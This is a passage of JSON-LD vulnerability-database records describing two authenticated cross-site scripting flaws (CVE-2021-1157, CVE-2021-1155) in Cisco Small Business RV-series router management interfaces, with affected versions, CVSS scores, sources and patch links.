        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-202101-0799",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "application extension platform",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.3.55"
          },
          {
            "model": "rv130 vpn router",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.3.1.7"
          },
          {
            "model": "rv130 vpn router",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.2.2.8"
          },
          {
            "model": "rv130w",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.3.1.7"
          },
          {
            "model": "rv110w",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.3.1.7"
          },
          {
            "model": "rv130w",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.2.2.8"
          },
          {
            "model": "rv110w",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.2.2.8"
          },
          {
            "model": "rv215w wireless-n vpn router",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.3.1.7"
          },
          {
            "model": "rv215w wireless-n vpn router",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.2.2.8"
          },
          {
            "model": "cisco rv130w wireless-n multifunction vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv130 vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "cisco rv110w wireless-n vpn firewall",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv215w wireless-n vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "application extension platform",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv130w no",
            "scope": null,
            "trust": 0.6,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "rv215w no",
            "scope": null,
            "trust": 0.6,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "rv130",
            "scope": null,
            "trust": 0.6,
            "vendor": "cisco",
            "version": null
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-41157"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002663"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-1157"
          }
        ]
      },
      "cve": "CVE-2021-1157",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "MEDIUM",
                "accessVector": "NETWORK",
                "authentication": "SINGLE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "NONE",
                "baseScore": 3.5,
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 6.8,
                "id": "CVE-2021-1157",
                "impactScore": 2.9,
                "integrityImpact": "PARTIAL",
                "severity": "LOW",
                "trust": 1.8,
                "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N",
                "version": "2.0"
              },
              {
                "accessComplexity": "MEDIUM",
                "accessVector": "NETWORK",
                "authentication": "SINGLE",
                "author": "CNVD",
                "availabilityImpact": "NONE",
                "baseScore": 3.5,
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 6.8,
                "id": "CNVD-2021-41157",
                "impactScore": 2.9,
                "integrityImpact": "PARTIAL",
                "severity": "LOW",
                "trust": 0.6,
                "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N",
                "version": "2.0"
              },
              {
                "accessComplexity": "MEDIUM",
                "accessVector": "NETWORK",
                "authentication": "SINGLE",
                "author": "VULHUB",
                "availabilityImpact": "NONE",
                "baseScore": 3.5,
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 6.8,
                "id": "VHN-374211",
                "impactScore": 2.9,
                "integrityImpact": "PARTIAL",
                "severity": "LOW",
                "trust": 0.1,
                "vectorString": "AV:N/AC:M/AU:S/C:N/I:P/A:N",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "nvd@nist.gov",
                "availabilityImpact": "NONE",
                "baseScore": 4.8,
                "baseSeverity": "MEDIUM",
                "confidentialityImpact": "LOW",
                "exploitabilityScore": 1.7,
                "id": "CVE-2021-1157",
                "impactScore": 2.7,
                "integrityImpact": "LOW",
                "privilegesRequired": "HIGH",
                "scope": "CHANGED",
                "trust": 2.0,
                "userInteraction": "REQUIRED",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
                "version": "3.1"
              },
              {
                "attackComplexity": "Low",
                "attackVector": "Network",
                "author": "NVD",
                "availabilityImpact": "None",
                "baseScore": 4.8,
                "baseSeverity": "Medium",
                "confidentialityImpact": "Low",
                "exploitabilityScore": null,
                "id": "CVE-2021-1157",
                "impactScore": null,
                "integrityImpact": "Low",
                "privilegesRequired": "High",
                "scope": "Changed",
                "trust": 0.8,
                "userInteraction": "Required",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2021-1157",
                "trust": 1.0,
                "value": "MEDIUM"
              },
              {
                "author": "ykramarz@cisco.com",
                "id": "CVE-2021-1157",
                "trust": 1.0,
                "value": "MEDIUM"
              },
              {
                "author": "NVD",
                "id": "CVE-2021-1157",
                "trust": 0.8,
                "value": "Medium"
              },
              {
                "author": "CNVD",
                "id": "CNVD-2021-41157",
                "trust": 0.6,
                "value": "LOW"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-202101-1023",
                "trust": 0.6,
                "value": "MEDIUM"
              },
              {
                "author": "VULHUB",
                "id": "VHN-374211",
                "trust": 0.1,
                "value": "LOW"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-41157"
          },
          {
            "db": "VULHUB",
            "id": "VHN-374211"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002663"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202101-1023"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-1157"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-1157"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers could allow an authenticated, remote attacker to conduct cross-site scripting (XSS) attacks against a user of the interface. The vulnerabilities are due to insufficient input validation by the web-based management interface. An attacker could exploit these vulnerabilities by sending crafted HTTP requests to an affected device. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive, browser-based information. To exploit these vulnerabilities, an attacker would need to have valid administrator credentials on the affected device. plural Cisco Small Business RV A cross-site scripting vulnerability exists in the router.Information may be obtained and information may be tampered with. Cisco RV110W is a Wireless-N VPN firewall, Cisco RV130 is a multifunctional VPN router, Cisco RV130W is a Wireless-N multifunctional VPN router, and Cisco RV215W is a Wireless-N VPN router. Cisco RV110W, etc. The following products and versions are affected: Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2021-1157"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002663"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2021-41157"
          },
          {
            "db": "VULHUB",
            "id": "VHN-374211"
          }
        ],
        "trust": 2.25
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2021-1157",
            "trust": 3.1
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002663",
            "trust": 0.8
          },
          {
            "db": "CNVD",
            "id": "CNVD-2021-41157",
            "trust": 0.6
          },
          {
            "db": "AUSCERT",
            "id": "ESB-2021.0141",
            "trust": 0.6
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202101-1023",
            "trust": 0.6
          },
          {
            "db": "VULHUB",
            "id": "VHN-374211",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-41157"
          },
          {
            "db": "VULHUB",
            "id": "VHN-374211"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002663"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202101-1023"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-1157"
          }
        ]
      },
      "id": "VAR-202101-0799",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-41157"
          },
          {
            "db": "VULHUB",
            "id": "VHN-374211"
          }
        ],
        "trust": 1.4114631585714283
      },
      "iot_taxonomy": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "category": [
              "Network device"
            ],
            "sub_category": null,
            "trust": 0.6
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-41157"
          }
        ]
      },
      "last_update_date": "2024-11-23T21:34:59.769000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "cisco-sa-rv-stored-xss-LPTQ3EQC",
            "trust": 0.8,
            "url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-rv-stored-xss-LPTQ3EQC"
          },
          {
            "title": "Patch for Cisco RV110W/RV130/RV130W/RV215W cross-site scripting vulnerability (CNVD-2021-41157)",
            "trust": 0.6,
            "url": "https://www.cnvd.org.cn/patchInfo/show/272231"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-41157"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002663"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-79",
            "trust": 1.1
          },
          {
            "problemtype": "Cross-site scripting (CWE-79) [NVD Evaluation ]",
            "trust": 0.8
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-374211"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002663"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-1157"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 2.9,
            "url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-rv-stored-xss-lptq3eqc"
          },
          {
            "trust": 1.4,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-1157"
          },
          {
            "trust": 0.6,
            "url": "https://www.auscert.org.au/bulletins/esb-2021.0141/"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-41157"
          },
          {
            "db": "VULHUB",
            "id": "VHN-374211"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002663"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202101-1023"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-1157"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-41157"
          },
          {
            "db": "VULHUB",
            "id": "VHN-374211"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002663"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202101-1023"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-1157"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2021-06-13T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2021-41157"
          },
          {
            "date": "2021-01-13T00:00:00",
            "db": "VULHUB",
            "id": "VHN-374211"
          },
          {
            "date": "2021-09-29T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2021-002663"
          },
          {
            "date": "2021-01-13T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202101-1023"
          },
          {
            "date": "2021-01-13T22:15:15.707000",
            "db": "NVD",
            "id": "CVE-2021-1157"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2021-06-13T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2021-41157"
          },
          {
            "date": "2021-01-15T00:00:00",
            "db": "VULHUB",
            "id": "VHN-374211"
          },
          {
            "date": "2021-09-29T04:56:00",
            "db": "JVNDB",
            "id": "JVNDB-2021-002663"
          },
          {
            "date": "2021-01-20T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202101-1023"
          },
          {
            "date": "2024-11-21T05:43:42.860000",
            "db": "NVD",
            "id": "CVE-2021-1157"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202101-1023"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "plural \u00a0Cisco\u00a0Small\u00a0Business\u00a0RV\u00a0 Cross-site scripting vulnerabilities in routers",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002663"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "XSS",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202101-1023"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-202101-0797

    Vulnerability from variot - Updated: 2024-11-23 21:34

    Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers could allow an authenticated, remote attacker to conduct cross-site scripting (XSS) attacks against a user of the interface. The vulnerabilities are due to insufficient input validation by the web-based management interface. An attacker could exploit these vulnerabilities by sending crafted HTTP requests to an affected device. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive, browser-based information. To exploit these vulnerabilities, an attacker would need to have valid administrator credentials on the affected device. plural Cisco Small Business RV A cross-site scripting vulnerability exists in the router.Information may be obtained and information may be tampered with. Cisco RV110W is a Wireless-N VPN firewall, Cisco RV130 is a multifunctional VPN router, Cisco RV130W is a Wireless-N multifunctional VPN router, and Cisco RV215W is a Wireless-N VPN router. Cisco RV110W, etc

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-202101-0797",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "application extension platform",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.3.55"
          },
          {
            "model": "rv130 vpn router",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.3.1.7"
          },
          {
            "model": "rv130 vpn router",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.2.2.8"
          },
          {
            "model": "rv130w",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.3.1.7"
          },
          {
            "model": "rv110w",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.3.1.7"
          },
          {
            "model": "rv130w",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.2.2.8"
          },
          {
            "model": "rv110w",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.2.2.8"
          },
          {
            "model": "rv215w wireless-n vpn router",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.3.1.7"
          },
          {
            "model": "rv215w wireless-n vpn router",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.2.2.8"
          },
          {
            "model": "cisco rv130w wireless-n multifunction vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv130 vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "cisco rv110w wireless-n vpn firewall",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv215w wireless-n vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "application extension platform",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv110w",
            "scope": null,
            "trust": 0.6,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "rv130w",
            "scope": null,
            "trust": 0.6,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "rv215w",
            "scope": null,
            "trust": 0.6,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "rv130",
            "scope": null,
            "trust": 0.6,
            "vendor": "cisco",
            "version": null
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-41159"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002666"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-1155"
          }
        ]
      },
      "cve": "CVE-2021-1155",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "MEDIUM",
                "accessVector": "NETWORK",
                "authentication": "SINGLE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "NONE",
                "baseScore": 3.5,
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 6.8,
                "id": "CVE-2021-1155",
                "impactScore": 2.9,
                "integrityImpact": "PARTIAL",
                "severity": "LOW",
                "trust": 1.8,
                "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N",
                "version": "2.0"
              },
              {
                "accessComplexity": "MEDIUM",
                "accessVector": "NETWORK",
                "authentication": "SINGLE",
                "author": "CNVD",
                "availabilityImpact": "NONE",
                "baseScore": 3.5,
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 6.8,
                "id": "CNVD-2021-41159",
                "impactScore": 2.9,
                "integrityImpact": "PARTIAL",
                "severity": "LOW",
                "trust": 0.6,
                "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N",
                "version": "2.0"
              },
              {
                "accessComplexity": "MEDIUM",
                "accessVector": "NETWORK",
                "authentication": "SINGLE",
                "author": "VULHUB",
                "availabilityImpact": "NONE",
                "baseScore": 3.5,
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 6.8,
                "id": "VHN-374209",
                "impactScore": 2.9,
                "integrityImpact": "PARTIAL",
                "severity": "LOW",
                "trust": 0.1,
                "vectorString": "AV:N/AC:M/AU:S/C:N/I:P/A:N",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "nvd@nist.gov",
                "availabilityImpact": "NONE",
                "baseScore": 4.8,
                "baseSeverity": "MEDIUM",
                "confidentialityImpact": "LOW",
                "exploitabilityScore": 1.7,
                "id": "CVE-2021-1155",
                "impactScore": 2.7,
                "integrityImpact": "LOW",
                "privilegesRequired": "HIGH",
                "scope": "CHANGED",
                "trust": 2.0,
                "userInteraction": "REQUIRED",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
                "version": "3.1"
              },
              {
                "attackComplexity": "Low",
                "attackVector": "Network",
                "author": "NVD",
                "availabilityImpact": "None",
                "baseScore": 4.8,
                "baseSeverity": "Medium",
                "confidentialityImpact": "Low",
                "exploitabilityScore": null,
                "id": "CVE-2021-1155",
                "impactScore": null,
                "integrityImpact": "Low",
                "privilegesRequired": "High",
                "scope": "Changed",
                "trust": 0.8,
                "userInteraction": "Required",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2021-1155",
                "trust": 1.0,
                "value": "MEDIUM"
              },
              {
                "author": "ykramarz@cisco.com",
                "id": "CVE-2021-1155",
                "trust": 1.0,
                "value": "MEDIUM"
              },
              {
                "author": "NVD",
                "id": "CVE-2021-1155",
                "trust": 0.8,
                "value": "Medium"
              },
              {
                "author": "CNVD",
                "id": "CNVD-2021-41159",
                "trust": 0.6,
                "value": "LOW"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-202101-1052",
                "trust": 0.6,
                "value": "MEDIUM"
              },
              {
                "author": "VULHUB",
                "id": "VHN-374209",
                "trust": 0.1,
                "value": "LOW"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-41159"
          },
          {
            "db": "VULHUB",
            "id": "VHN-374209"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002666"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202101-1052"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-1155"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-1155"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers could allow an authenticated, remote attacker to conduct cross-site scripting (XSS) attacks against a user of the interface. The vulnerabilities are due to insufficient input validation by the web-based management interface. An attacker could exploit these vulnerabilities by sending crafted HTTP requests to an affected device. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive, browser-based information. To exploit these vulnerabilities, an attacker would need to have valid administrator credentials on the affected device. plural Cisco Small Business RV A cross-site scripting vulnerability exists in the router.Information may be obtained and information may be tampered with. Cisco RV110W is a Wireless-N VPN firewall, Cisco RV130 is a multifunctional VPN router, Cisco RV130W is a Wireless-N multifunctional VPN router, and Cisco RV215W is a Wireless-N VPN router. Cisco RV110W, etc",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2021-1155"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002666"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2021-41159"
          },
          {
            "db": "VULHUB",
            "id": "VHN-374209"
          }
        ],
        "trust": 2.25
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2021-1155",
            "trust": 3.1
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002666",
            "trust": 0.8
          },
          {
            "db": "CNVD",
            "id": "CNVD-2021-41159",
            "trust": 0.6
          },
          {
            "db": "AUSCERT",
            "id": "ESB-2021.0141",
            "trust": 0.6
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202101-1052",
            "trust": 0.6
          },
          {
            "db": "VULHUB",
            "id": "VHN-374209",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-41159"
          },
          {
            "db": "VULHUB",
            "id": "VHN-374209"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002666"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202101-1052"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-1155"
          }
        ]
      },
      "id": "VAR-202101-0797",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
